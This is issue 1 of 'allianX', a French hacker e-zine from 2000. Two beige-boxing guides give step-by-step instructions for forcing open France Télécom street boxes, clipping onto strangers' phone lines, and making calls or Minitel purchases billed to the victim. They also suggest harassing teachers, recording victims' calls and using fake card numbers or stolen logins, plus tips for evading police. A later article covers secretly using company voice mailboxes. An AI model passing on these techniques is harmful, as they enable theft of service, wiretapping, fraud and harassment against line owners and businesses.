Copy Link
Add to Bookmark
Report
AllianX Issue 1
---><>>> Version Windows.....800*600 pour une meilleure lecture... <<<><---
allianX #1 --== Lundi 10 Juillet 2000 ==--
Team allianX
___ ___
| || | ___ ___
/\\ | || | \ \ / /
/ \ \ | || | \ \ / /
/ \ \ | || | __ __\ \ / /
/ \ \ | || |__ ___ / \ / \ \ / /
/ /\ \ \ | || |__| / \ | \ | |\ \/ /
/ /__\ \ \ | || |__ / /\ \| \ | | \ /
/ ___ \ \| || | | /__\ \ \| | /
/____/ \ \ \ || | | ___ \ |\ |/ /\ \
\____/ \ \ \ || | | / \ \ | \ | / \ \
\ \ \_||___|___\/ \ \| \ | / \ \
\ \ \ \__\ \__// \_/
\____\_\ / /
\_/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
SoMMairE allianX #1
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
****************************************************************************************
** SuJeT ..........................................................AuTeUr **
****************************************************************************************
** **
** Edito ......................................................... allianX **
** Le Beige Boxing ............................................... 720 **
** Le Beige Boxing ............................................... Sauron* **
** Petit coup de gueule à ce sujet ............................... Ad-Tonnou **
** transfert de fichier par vmb .................................. Tuniz2000 **
** Hack de répondeurs de portable ................................ Ad-Tonnou **
** Le concept d'open source ...................................... Redfire **
** Sécurité Linux ................................................ [-AhfeeLinuX-] **
** Sécurité Linux ................................................ Sauron **
** Le Mirc Scripting ............................................. Ft-One **
** Programmation shell et backdoor sous linux .................... Sauron **
** Obtenir des infos sur une cible ............................... Sauron **
** Introduction au TCP/IP ........................................ Ad-Tonnou **
** Tutorial turbo pascal ......................................... Ad-Tonnou **
** un deuxieme tutorial Turbo Pascal ............................. Ad-Tonnou **
** Le Corewar ? hum...'sont fous ces ricains ..................... Tuniz2000 **
** Pas payer ses amendes ??? tiens, tiens ........................ 720 **
** Le mot de la fin .............................................. AllianX **
** **
****************************************************************************************
*: Suite à une mauvaise organisation de notre part...on a deux différents articles sur le Beige Boxing...mais c'est cool cela vous donnera deux points de vue différents...
Désolé ce mois ci on a presque pas de hacking...le mois prochain on va se concentrer sur le hacking et Linux....
Vous êtes intéréssé par la team ?
Vous pouvez me joindre sur la vmb : 3651 0800 010 800,,*4540 (ma bal est la 4540)
PS --> hors de question d'integrer des personnes dans le groupe me proposant des articles du genre hack par ftp/spoofing irc/anonymail....
On s'est un peu precipités sur la fin, mais on a essaye tout de meme de faire du mieux qu'on pouvait, j'espere que ce mag vous plaira, si oui, on fera le numéro 2, sinon on arrete...
PS (bis) --> Désolé mais pris de court je n'ai pu corriger l'orthographe des derniers articles
PS (bis²) --> merci à Paranoid pour son joli ascii
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
eDiTo allianX #1
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Je lis dans la majorité des zines que j'ai l'occasion de consulter :
"Nous n'avons nullement l'intention et la prétention de remplacer les grands classiques comme noroute..."
Et je profite de cet édito pour pousser un petit coup de gueule...
Tout d'abbord je tiens a dire que ce n'est pas avec des raisonnements de ce genre que nous pourrons faire bouger la scène underground francophone, qui, comme vous l'aurez surement remarqué (je n'en doute point), va très mal :
Les lamers bouffent les newbies et prennent la grosse tête, les élites nous quittent, les bons se font de plus en plus rares...et je parle pour l'underground sous tous ses aspects (phreaking, hacking, cracking...), heureusement il reste un domaine où nous exellons: le lamering...
Je vais reprendre une phrase de mon ami Zarconen (mais si, je sais que tu m'aimes bien) qui résume parfaitement la situation de la scène :
"Ne trouvez vous pas cela étrange qu'il y ait de plus en plus de personnes s'interressant au hacking et de moins en moins de hackers ???"
Vous l'aurez compris, on a tous les droits de penser que la scène francophone est morte...
De plus, un aspect a entierement detruit mon espoir de renaissance de cette susdite scene: la majorite des zines sont morts....
Petites comparaison révélatrice: je compte près d'une trantaine de zines sur mon HD ayant été diffusé entre janvier et juin 98, un peu moins pour l'année 99...Si l'année 99 aura été le rodage voire la sénilité de la scène francophone, l'année 2000 sonne son glat: je compte 5 zines tout au plus sortis durant cette même pèriode...
Mi Mars, Hackoff22 sortait, et souffla sur la flamme, si petite soit elle, d'esperance du renouveau de la scene, puis est né le zine qui se nomme RTC mag, exellente qualité...
Ainsi, pourrais-je espérer cette renaissance ??? (je parle beaucoup de moi, ce n'est pas de l'égoîsme mais tout simplement je pense ne pas etre le seul a penser de la sorte...)
Pour en revenir a ma premiere remarque, arretons de nous retourner pour voir les depouilles de nos ainés et les contempler (noroute etc...), mais prenons plutot exemple sur eux et grimpons encore plus haut...
Les ainés sont là pour donner l'exemple aux cadets, mais viend un temps ou ceux la mêmes doivent essayer de surpasser ces dits ainés, tout seuls, c'est ça le progres...
J'espere de tout coeur que ce temps est arrivé, à nous de nous envoler....
De surcroit, je tiend à préciser, et cela n'engage que moi, qu'à mon gout les NoRoute et autres NoWay ont déja été dépassés...par des mags tels que HackOff ou bien Cryptel (que je trouve vraiment exellents...les gars, je pense tres fort a vous, et courage...)
C'est donc apres cette petite introduction que je vous presente ce nouveau zine, fruit comme vous vous en doutez d'un long travail (et oui, c'est pas en regardant les oiseaux voler que ce zine s'est ecrit)!
J'espere qu'il vous plaira et que vous apprecierez le soin particulier que nous avons consacré à l'originalité des articles qui le composent...
En ésperant que ce soit le premier d'une longue dynastie, j'ai le plaisir de vous présenter allianX #1
PS ---> Je remercie de tout coeur ceux qui comme nous essaye de se bouger le cul (je dis bien essaye...) à faire avancer la scene du mieux qu'ils le peuvent et j'encourage ceux qui n'osent passer le pas lecture/ecriture...
Je finirais par ce bout de dialogue que j'ai copié dans un chan sur dalnet sur #hackers, chez les ricains...
<Ad-Tonnou> The french scene is not dead...
<Ralph> The french scene ?? whats dat ?? ;)
<okion> A new film ?? hehehe...
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Le Beige Boxing 720
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
++++++++++
+SOMMAIRE+
++++++++++
I°) INTRO.
II°) BRANCHEMENTS.
III°) DIVERS MOYENS D' UTILISATIONS.
IV°) A SAVOIR POUR NE PAS SE FAIRE CHOPER (A LIRE IMPERATIVEMENT)
V°) RISQUES
_______________________________________________________________________________________________
*************
* I°) INTRO *
*************
Bon on commence, tout d' abord cet article est réservé aux débutants mais s'avère quand même complet sur le beige boxing par rapport à d' autre zines.
QU EST CE QUE LE BEIGE BOXING??? : C est en fait le fait de se connecter en dérivation sur la ligne telephonique de quelqun d autre, donc d utiliser sa ligne sans rien payer...
Pour cela il y a vraiment rien de plus facile, voila l'inventaire de ce qu il vous faut:
--> Un appareil utilisant une ligne telephonique (telephone, ordi portable avec modem....) le tout ayant une alim independante. (pas se secteur mais pile, batterie....)
--> Un cable de sortie de téléphone bidouillé (explication plus loin)
--> Une parfaite connaissance du sujet donc lisez bien tout l article.
Vous me direz pour se brancher sur une ligne il faut bien la trouver quelquepart non?
Oui!!! je suis intelligent hein???? :-)
Or nous amis Francs Taxeurs (FT)(Nd ad-tonnou --> trop fort) sont cons (bon ça on le savait, mais bon ca fait plaisir de se le dire et redire)
Ils sont tellements cons que pour réhausser le courant des lignes de tel (eh oui l effet de joule est avec nous ), ils ont parsemé partout des bornes où les lignes de tel des particuliers sont a nu (en petit fils quoi)
Elles sont reconnaissables par le signe FT sur leurs facades /!\ a ne pas confondre avec EDF GDF....
On trouve généralement ces bornes sous trois formes différentes:
-Les plus classiques, des sortes de boitiers plus ou moins grand (Nd ad-tonnou --> pas plus que 25*25 cm) qui peuvent être en bas des potauts (rare) ou en haut. Notons que pour les acrobates comme moi celles en haut de poteaux en betons de EDF sont accessibles grace à leurs marches encastrées. Mais attention à la chute.
POUR LES OUVRIR: elles sont souvent ouverte en haut des potaus et en bas pareil sinon il faut forcer comme un barbare
Sur certaines bornes nouvelles il y a une sorte de poussoir rouge en bas il faut alors soulever la borne tout en appuyant sur le bouton.
-Il y a aussi des bornes qui ressemblent aux bornes de kilometrage (comme sur les routes)
par leur forme, elle sont blanches.POUR LES OUVRIRS: PIED DE BICHE à la bourrin (Nd ad-tonnou --> oui, la hache marche pas mal aussi)
-Et pour finir il y a les bornes sous terre semblables à des plaques d'égouts mais rectangulaires (il y a le logo FT dessus). Elles sont très lourdes.
POUR LES OUVRIR: soulever avec pied de biche grace aus petits trous prévus a cet effet.
_______________________________________________________________________________________________
*********************
* II°) BRANCHEMENTS *
*********************
Bon je pense que l appareil vous l'avez, par contre le cable bidouillé je sais pas donc voila ce qu il faut pour le faire:
---> Prenez un cable tout con de téléphone (RJ11) il est deja sur votre téléphone, eh oui! les téléphones ont un cable!!! non serieux?? (le mieux est d'avoir un tel avec une prise femelle RJ11 comme ca on peut l'utiliser comme un téléphone normal en changeant le cable avec un normal)
---> 3 pinces crocos
---> Un fer à souder
Bon on a tout alors c est facile on dénude la sortie du cable (on coupe le fils quoi)
pour arriver en gros a ca:
---------
prise de tel]-------[cable telephonique]----x---------
---------
et là on voit quoi?? 3 fils, eh oui les trois fils du tel
(en fait 2 sont utiles et le troisieme que sur certaines lignes.)
Je ne dirai rien sur les couleurs des fils car elles changent et il ne faut pas s' y fier.
Une fois ceci fait, on soude les 3 pinces crocos aux 3 fils
------<
---------<---=fil tel <=pince croco
------<
.. Et voilà un beau cable tout neuf.
On va pouvoir se brancher sur une ligne en dénudant sans couper les fils de tel de quelqun d autre, et apres on
n aura plus qu a se connecter en dérivation avec les pinces crocos (simple quoi).
AVANT IL FAUT TESTER LE CABLE !!!
Pour cela faite le chez vous (en démontant votre prise de tel et essayer pour voir quels sont les 2 fils utiles.
puis différencier les avec des couleurs. (vous remarquerez que si vous inverser les fils dans les branchements de votre prise de tel, cela fera sonner votre autre téléphone (si vous en avez deux)
/!\ EN GROS si vous vous gourez lors de votre branchement pendant un session beige le tel de votre victime sonnera (pas genial comme discretion surtout vers 2h du mat)
Voila maintenant votre cable marche et vous savez quels fils marchent donc on va mouvoir commencer les choses serieuses.
_______________________________________________________________________________________________
_______________________________________________________________________________________________
************************************
*III°) Divers moyens d utilisation *
************************************
###############################################################################################
#ATTENTION : Les techniques decrites ici doivent etre appliquées APRES avoir lu la section IV # ###############################################################################################
A) La plus rapide façons d utiliser le beige c'est de brancher votre téléphone sur une borne et d'utiliser la ligne
normalement:
Il faut donc ouvrir une borne et trouver des fils où se brancher (souvent en couple) là on dénude les fils sans les couper (cela tres chiant, il faut grater le cahoutchouc isolant)
Je vous conseil un banal cutter pour gratter l'isolant. Bon et ben apres on met les pinces crocos sur les fils et on verifie q'on a la tonalité. Non?? alors vite on débranche et on essaye une autre combinaison car ca peut sonner chez la victime. bon une fois qu'on a la tonalité on peut alors telephoner gratos!!!!
MAIS ATTENTION, VU QUE C'EST ILLEGAL ON PEUT SE FAIRE CHOPER POUR EVITER CELA:
*Ne jamais appeller quelqun que vous connaisser (Bah oui ça restreint l'utilisation, je sais)
POURQUOI: tout simplement que si la victime s'aperçoit du piratage de sa ligne (il y en a qui sont maniaques avec les factures détaillées même pour 10fr a 3h du mat ils le voient) il va porter plainte et là les filcs vont voir qui vous avez appellé et après....cuisinage....
Si jamais vous appellez car vous etes vraiment con (je repete a ne jamais faire) surtout le gars que vous appeller ne doit pas vous rappeller juste apres où même 3h apres.) car là vous etes vraiment grillé.
Donc /!\ (ceci marche aussi bien avec les portables.)
Mais alors quelle utilité et ben pas grand chose: a part les canulars (bof bof), les numeros de culs a 5f/mn (bof bof)
Enfin tout ce qui est anonyme.
B)Viens ensuite une des utilisation la mieux du beige box: le minitel
POUR CELA il faut un ordinateur portable avec une carte modem et un émulateur minitel et une batterie d'assez longue durée.
Même procedure pour le cable sauf que bien sur ici il faut un cable de modem à dénuder. Je sais, c'est con de le preciser.
On a donc un beau minitel a utiliser. Et ce qui est bien c est que avec le minitel on ne sais pas où vous êtes allé.
Je m explique: sur la facture détaillé de la victime il y aure marqué 3615 3617 3614... MAIS pas 3617 "euridile" pour vérifier la bonne santé de FT.
Quelle utilité? et bien minitel de cul. (Nd ad-tonnou --> quel obcédé ce 720)
MAIS LE PLUS INTERRESSANT c'est les serveurs d achats du type 3617 SETH*AX , SEL ...
Le principe: on commande des articles comme des jeux, des téléphones portable, du hardware....
et on reste connecté le temps de payer en communication telephonique (à 5.57/mN).
Eviron 9h pour 1000Fr oui je sais c est des arnaqueurs car 60 * 5.57 * 9 = 3007Fr
De toutes façons, on s'en balance on paye rien...
Je precise que les commandes peuvent être efectuées en plusieurs fois avec un mot de passe (heuresement).
Donc vous allez sur un de ces serveurs et vous commander et voilà 2 jours après vous avez votre truc.
Notons que les colis sont le plus souvent expediés en colissimo et il vous faut donc sigenr un reçu (donc une preuve contre vous) Bon mais là on peut pas se faire nicker me direz vous puisque on sait pas sur quel serveur vous etes aller donc votre adresse est bien à l'abri sur le serveur et il y a aucune preuve.
Et bien SI il y a un risque de se faire choper: les serveurs d achat comme ceux là sont parfois surveillés par un organisme dont je ne connais pas le nom. En gros ils voient qui est connecté sur le serveur, depuis combien de temps....
Ils peuvent tout voir quoi y compris votre adresse de livraison, donc si ils voient que vous connecter tout le temps à 2h du mat pendant 2h(la durée de votre batterie) a chaque fois, à ils vont peut etre se demander ce qui se passe et apres ils pourront débarquer chez vous pour vérifier si vous avez bien acheté legalement l objet, donc attention!!
Moi perso je vous conseille de commander des petits trucs genre carte de recharge mobicarde ou SFR 144F et vous les revendez 100F enfin voila quoi. Mais je ne connais personne qui se soit fait choper comme ça, en fait je ne suis pas sure à 100% que ces Men In Black du minitel existent vraiment, mais je vous le dis au cas où.
(Nd Ad-tonnou ---> autre solution, trouvez une maison de vacance inhabitée ou alors une maison abandonnée et squattez y la boite aux lettres, vous recevez, signez ce qu'il doit etre signé et barrez vous...Ne jamais utiliser la meme boite aux lettres...)
C)Encore un autre utlisation:
SCANNER des PBX sur des num azurs: Eh oui vous savez que de nombreux num vert propose des VMB et des PBX(plus rare)
là ça va pour les scannez car c est gratuit mais les num azurs ou indigo ou violet eo rouge fushia????
Et bien aussi mais bon on n a pas que ca a faire de scannez des numero payants donc on le fait a partir d'une beige box et si on trouve un outdial c est cool car pour appelez en national... c est tjs plus économique que le tarif normal.
Bon vous savez que vous pouvez le faire manuellement ou automatiquement avec un logiciel du type phonetag.....
D)ALLEZ SUR INTERNET mais là attention!!!!! ne faites pas les cons, ne vous connectez pas avec votre compte sinon évidemment, vous etes grillé, ben oui réflechissez:
VICTIME: à 3h du mat il y a eut un appel de 2h sur le ************ = je porte plainte
FLICS: vont voir que ce numéro correspond à un bruit du genre "psshhhhhhhttt, bruiuuuuuuu" vont se renseigner sur le serveur correspondant à ce numéro allo? qui c'est connecté à 3h du mat ?? : Mr HACKER2000 (votre login) et d'où?? Du numero de la victime
et la vous etes grillé et salut votre liberté.
Donc il faut vous connecté anonymement ou sur le compte de quelqun d autre.
COMMENT??? soit en fesant des heures gratuites de par exemple AOL avec un faux num de CB et en vous désabonnant avant 1 mois.
(EN DONNANT bien sur un faux nom adresse.... mais en les gardant pour se désabonner en les appelant.). Ou alors vous pouvez aussi le faire sur le compte du quelqun d autre en ayant son login et mot de passe. Ca j explique pas, c'est marqué dans plein de zines
E) surveiller la ligne de la victime en faisant un petit montage tout con avec un petit enregistreur ou meme en achetant des appareils speciaux (100f dans micro achat) qui enregistrent automatiquement tout appel sur la ligne.
Enfin il y a vraiment plein de trucs, je vous ai expliqué que les plus courants.
*******************************************************************************
VI)ATTENTION POUR NE PAS SE FAIRE CHOPER!!! / QU EST CE QUE VOUS RISQUER??? **
******************************************************************************
D abord il faut que vous apprenniez a savoir si la ville est au courant que des petits malins piratent des lignes et si ils vous cherchent. Donc pour savoir si ils vous cherchent il suffit de par exemple mettre un petit bout de scotch sur les box, et si deux semaines apres il n y a plus les scotchs alors là logique, il vous recherchent ou au moins sont au courant de vos agissement et donc ont avertis les flics!!!!
Bon pour pas vous faire pecho déjà il faut changer de box au maximum, alterner quoi, n'allez pas tout le temps sur la même box quoi!! sinon vous etes vraiment con.
N'appelez jamais un pote, ca sert à rien de faire une box pour appeller un pote q habite à 3km merde!!
N'allez jamais sur le net avec un compte à vous.
Ne dites a personne que vous faisez ca (Nd ad-tonnou --> PITOYABLE !!! on dit "vous faites"). Si les flics débarquent chez vous because vous avez fait une commande sur le minitel alors je vous conseille de faire genreque c'est un gars dans la rue que vous ne connaissez pas qui vous a proposé, genre un dileur quoi, je sais c'est un vieille feinte mais bon c'est toujours ça, enfin je sais pas faites comme vous le sentez mais je vousconseille de prevoir le coup parce que si ils debarquent chez vous à l'improviste c'est clair que vous serez pas quoi faire...c est clair. Mais pour éviter ça il vous suffir de ne jamais donner votre adresse, donnez plutot celle d un gars qui une fois le colis reçu vous paiera avec un tarif special (un gros bouffons quoi). de toutes facon reflechissez bien avant de vous lancer la dedans parce que céest chaud.
Surtout si vous avez d'autres idées n'hesitez pas à me les communiquer. BON vous risquez une grosse amendes et un bon paquet d'années à Fleury... VOILA CA CALME HEIN!! ben oui ca va!!
Pour plus de renseignements à ce sujet, allez sur www.phreakon.fr.st, site d'une team qui s'est spécialisé dans le phreaking...
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Le Beige Box Sauron
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Nd ad-tonnou --> Vous allez avoir deux points de vue différents: celle de 720 qui s'y connait bien sur le beige boxing et celui de Sauron, plus naïf, après cela, si on me dit encore que le beige box marche pas...
##### Comment Phreaker une ligne en mois de deux #####
Je tient avant toute chose a dire que le phreak est une chose extremement simple et qui marche a tous
les coups. Lorsque l'on a la tonalité on se rend compte a quel point sont mal faits les reseaux téléphoniques.
Je n'ai aucune connaissance particulière dans les télécoms et pourtant c'est si simple....
Il vous faut trouver les bornes france télécoms pour pouvoir les pirater, elles se trouvent partout dans toutes les rues (sauf quand les cables sont souterrains mais quasiment tout le tps ce n'est pas le cas).
Selon les régions, ou les quartiers elles sont en hauteur (accrochées au poteau) ou basses. Chez moi, elles sont partout basse :o) Il y a plusieurs types de bornes, certaines sont dans une matière ressemblant au crépis, inutile d'essayer de les ouvrir vous n'y arriverez pas, ou alors vous vous ferez remarquer! Les plus courantes font 30 cm de largeur pour 20 de haut ( approximatif ), elles sont blanche et un téléphone est représenter dessus mais il n'est pas tres visible . Ces bornes là sont fixées par une vis en bas. En utilisant la maniere forte, elle pète a tous les coups, sinon c'est pas dur de trouver la bonne clé... Pettez en une qui est plus à l'écard que les autres, regardez a l'interieur, il y a des sortes de dominos en plastique (non conducteur). Tous ne sont pas utilisés, chaque domino correspond à une ligne téléphonique. Le phreak peut servir pour ecouter quelqu'un, ou pour se servir de sa ligne.
En vous branchant dessus vous obtenez le meme resultat que si vous rajoutez un téléphone dans votre maison :
vous pouvez être a plusieurs au telephone mais ne pouvez appeler deux personnes differentes en meme temps puisqu'il n'y a qu'une ligne. Les lignes téléphonique viennent de sous les dominos,ce sont de gros cable noir d'ou sortent deux fils qui vont tout direct dans les dominos... Avec un briquet ( c'est le plus rapide ) brulez ces fils, de maniere a faire fondre
le plastique, cela les dénude. Maintenant vous n'avez plus qu'a vous branchez dessus.
MATERIEL : J'appelerai Prise Femmelle la prise dans laquelle vous branchez vos telephone chez vous.
Il vous faut un cable de telephone, avec une prise femelle au bout. A l'autre extremiter mettez des pince croco.
*** Si vous n'avez pas de prise femelle : c'est pas un drame mais c'est plus pratique d'en avoir comme ca on raccorde ce que l'on veut au bout ( pc portable, telephone, etc .... ). Dans ce cas faites comme precedent et bidouillez vos deux fils avec les deux fils de la prise màle du telephone ou du pc portable (pas dur du tout ).
Voila, mettez vos pince croco, branchez ce que vous voulez sur la prise femelle, c'est a dire tout a fait normalement et verifiez que vous avez la tonalité, si c'est le cas, à moins d'être dans le 16ieme a Paris, n'abusez pas trop qd meme, il y en a qui paye, et puis si ils ont la facture detailler et qu'ils grillent, ils risquent d'appeller France Telecom...
Dans ce cas, les personnes que vous avez appeller risquent d'avoir des probleme (questionnement, etc...). Ca peut etre pratique pour harceler la pire des races : les profs !! GrrRR, je les detestes presque tous !! Sinon, pour se connecter pepere (Nd Ad-Tonnou --> ma mère est prof) toute la nuit, ou bien faire des conneries en etant certains de ne pas etre retrouver..
#### NOTE #####
Je sais que c'est debile mais on sais jamais !!! Si vous vous connectez, n'utilisez pas un compte que vous avez deja utilisez de chez vous ou d'ailleurs, sinon vous vous ferez retrouver et là ca risque d'aller tres mal !!
#### EON #####
Bon, voila, je peux vous assurer que ca marche à tous les coup et c'est rapide, suffit de reperer les lieux, c'est mieux si c'est un quartier que vous connaissez, prenez vos precautions qd meme !!!
Sauron
petit remerciement a mon pote BUD, "merci gars".
Nd ad-tonnou --> encore une fois, nous sommes désolés pour les deux articles sur le beige box...
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
CouP dE GueULe ad-tonnou
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<ad-tonnou> Qui pratique le Beige Boxing ici ??
<XXXXXXXXX> Arf!
<ad-tonnou> quoi arf ???
<XX> lol
<ad-tonnou> quoi qu'est ce que j'ai dit ??!
<XXXXXXXXX> tu le fais exprès ou quoi ?? Les box ça marche plus en France !!!
<XX> clair...en plus avec le beige box les communications sont gratuites que pour tes potes!!! c'est naz..
<ad-tonnou> ...no comment...
HéHo !!! Y'en a marre !!!
Cela m'arrive tous les jours....des pov' abrutis qui sous pretexte d'avoir lu dans un pov' zine que les box ne marchaient plus en france le crie sous tous les toits sans refléchir...refléchir, capacité de penser indépendemment de ce que disent les autres...
He!! Cela vous arrive de sortir un peu ???
Bordel je vois pas pourquoi quand on démonte une borne et qu'on se branche dessus cela ne marcherait pas....vraiment n'importe quoi !!!
<XX> clair...en plus avec le beige box les communications sont gratuites que pour tes potes!!! c'est naz..
A ce commentaire si débile je vais répondre un truc ---> ESCUSE !!!
C'est de la black box que tu parles pov' pommé...
En plus je vous ferai remarquer que le réseau téléphonique Français n'a pas été changé depuis des annnées...donc ce qui marchaient avant marche toujours....
Ce sont les moyens de repèrage qui ont évolué...la black box marche toujours...sauf que c'est hyper tracable c'est tout...
Avant de parler de beige box...on s'informe les gars...et on sort! On essaye soi-même avant de se ridiculiser...
Le pire dans cet exemple c'est que c'est moi qui suis passé pour un pommé....
Autre exemple...la Spy box...une dixaine de boxes se montent directement sur le téléphone...vous avez changé de téléphone ces dernières années ??? Alors!!! Sombres idiots...!
Pour plus de precission sur les boxes ---> www.phreakon.fr.st
Les prochaines remarques de ce genre seront loguées, et j'hésiterai plus à donner les noms....
Vraiment des kriss d'idiots....lisez les deux articles sur le beige box....
arf!
--== ad-tonnou pour vous servir ==--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Transfert de Fichier Par VmB Tun!Z2000
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
___ _____
************************** / | - --- --| ___ |
* File transfert * |0 _| -- - - -| ___ |
* * |8 / -- -- -| ___ |
* on VMB * |0 | - -- - --|_____|
* * |0 |
* by Tun!Z2000 * |x | S E N D
* * |x | F I L E Z
* Mail me at : * |x | F O R
* * |x | F R E E
* Tuniz2000@yahoo.com *~~~~|x \_ _____
* *~~~~|x | | ___ |- --- --
************************** \___| | ___ |-- - - -
| ___ |-- -- -
|_____|- -- - --
La lecture de cet article implique que vous savez ce que vous risquez si jamais vous décidez de mettre ceci en application, à savoir que l'utilisation illégale d'une VMB peut etre gratifiée d'un gros PV ou d'une longue visite guidée à Fleury-Mérogis si vous vous faîtes prendre.
C'est mon premier article diffusé a grande echelle (plus de 3 personnes :) alors je sais pas si je vais être assez clair dans mes propos ou si vous allez etre largués au bout de trois lignes mais je vais faire de mon mieux.
I) La VMB
1) Présentation
2) Choix de la VMB
3) Protocoles de transfert
II) Le systeme SSTV
1) Fonctionnement théorique
2) Application
III) Le protocole RTTY
1) Fonctionnement théorique
2) Application
IV) Zi end
***********************************************************************
I) La VMB
1) Présentation
Bon alors, ceux qui ont déjà phreaké un peu savent ce qu'est une VMB (Nd ad-tonnou --> Vocal Message Box).
Pour ceux qui savent pas, rapidement une VMB c'est un systeme de messagerie vocale qui sert pour toute une entreprise, chaque personne avec son repondeur sur la même VMB. Une VMB, c'est facile à phreaker, mais pour ça lire les Noroute et les Noway, je suis pas la pour parler de ça. En théorie, à moins d'avoir des grosses quantité de messages à recevoir, ou d'aimer discuter en differré, le phreak de VMB est pratique mais ne sert à rien d'autres. Pour le transfert de fichier, contrairement à ce que l'on peut entendre, la VMB peut servir : c'est pas parceque la VMB ne peut pas recevoir de message via une ligne comme un modem depuis le Web que le HTTP et le FTP sont les seuls protocoles de transfert qui existent!
2) Choix de la VMB
Tout d'abord, prennez une VMB en numero vert, parceque ca sert a rien de passer par la VMB si c'est pour casquer un max de thunes (autant passer par l'adresse mail c'est plus simple et moins cher et pis c'est plus légal). Ensuite, choisissez plutôt une grosse boîte parceque ca sera moins visible sur les factures FT de la boîte (ben vi, ca prend du temps d'envoyer des fichiers et un message de plus de deux minutes est toujours suspect). Evitez pour la meme raison le transfert le jour (imaginez que le proprio de la boite utilisée a envie de voir ses messages pile à ce moment (Nd ad-tonnou --> pas si c'est TA boite, c'est à dire si tu mets un pass à toi...)), ou utilisez une boite vocale libre, mais même faites le la nuit quand meme (enfin apres 9 heures du soir c'est bon).
Astuce : FT nous offre plein de VMB ! NON ? Si ! Sur le 3611, tapez Numéro vert, et hop une soirée de scanning s'impose
3) Protocoles de transfert
Le protocole RTTY est un protocole de transfert sur les ondes radios de données informatiques, et le systeme SSTV est un systeme de transmission d'images de tout les formats. (A noter que l'armée française utilise encore de temps en temps le protocole RTTY pour le transfert données)
***********************************************************************
II) Le systeme SSTV
1) Fonctionnement théorique
Le systeme SSTV est un systeme de transmission via les ondes radios de. Pour information, ce systeme date de 1958. A l'epoque il servait de moyen de transmission d'images en noir en blanc avec une fréquence "Blanc", une fréquence "noire" et plein de fréquences "Niveau de gris". Aujourd'hui, avec 3 balayage successifs, le SSTV permet l'envoi d'images couleurs. SSTV signifie SlowScanTeleVision, et pour les interessés, on capte beaucoup de données SSTV en BLU (bande latérale unique) sur 14.230 à 14.235 MHz. Mais bon on est pas la pour parler radio, mais SSTV. Bon alors pour convertir une image de numerique à sonore le plus simple est d'utiliser un logiciel qui le fait pour nous. Sous Zindoz, il y a Win95SSTV, sous Dos avec SoundBlaster, ya SoundBlasterSSTV, pour linux j'ai pas trouvé :( mais ca doit bien exister je desespere pas. Bon on lance son programme et on charge son image que l'on converti (bouton Transmit pour Win95SSTV) et la miracle, y'a un drole de bruit qui sort des enceintes du micro ! Reglez aussi le protocole qui permet de definir la resolution des images : vous pouvez avoir de tres bonnes resolutions en protocole AVT (pour Amiga Video Transmission), ou des qualités plus ou moins acceptables avec Robot ou Martin M1. Les images peuvent etre codée de quelques secondes à quelques minutes.
2) Application
Primo il vous faut une boite sur une VMB. ensuite, soit vous etes du genre prudent (voire parano), et vous preferez telephoner d'une cabine, soit vous le faites chez-vous. D'une cabine, c'est galere : reliez un walkman enregistreur sur la prise Sortie de votre carte son avec un cable a double jack et "enregistrez le bruit de l'image", ou avec un MiniDisc (soyons moderne et puis la qualié est meilleure). Ensuite descendez dans votre cabine appellez la VMB et laissez votre message en appliquant bien le hautparleur du walkman ou du MD sur le micro du combiné, et en limitant autant que possible les bruits exterieurs. Pour recevoir faites l'inverse : collez votre enregistreur sur le combiné de la cabine et enregsitrez le message, puis branchez votre enregistreur sur la prise Micro de votre carte son et faites passez l'enregistrement sur votre ordi. De chez vous c'est plus simple, vous appelez depuis l'ordinateur via modem, vous transferez directement de la prise "Sortie sonore" de la carte son à la prise "Entrée" du modem via un cable a double jack pour envoyer vos images, et "Sortie" modem vers "Entree" carte son pour recevoir.
Lorsque l'on reçoit les images que ce soit depuis un enregistrement ou une VMB depuis le modem, on lance SSTV pour activer le décodage de l'image : c'est très délicat, une petite déviation sonore peut fausser les niveaux de couleurs : image trop vive ou trop sombre, decalage des couleurs,... Bref avant de recevoir pour de vrai une image par SSTV, il vaut mieux s'entrainer avec des enregistrements que vous avez fait et que vous vous repassez jusqu'a obtenir l'image nette, semblable à l'original.
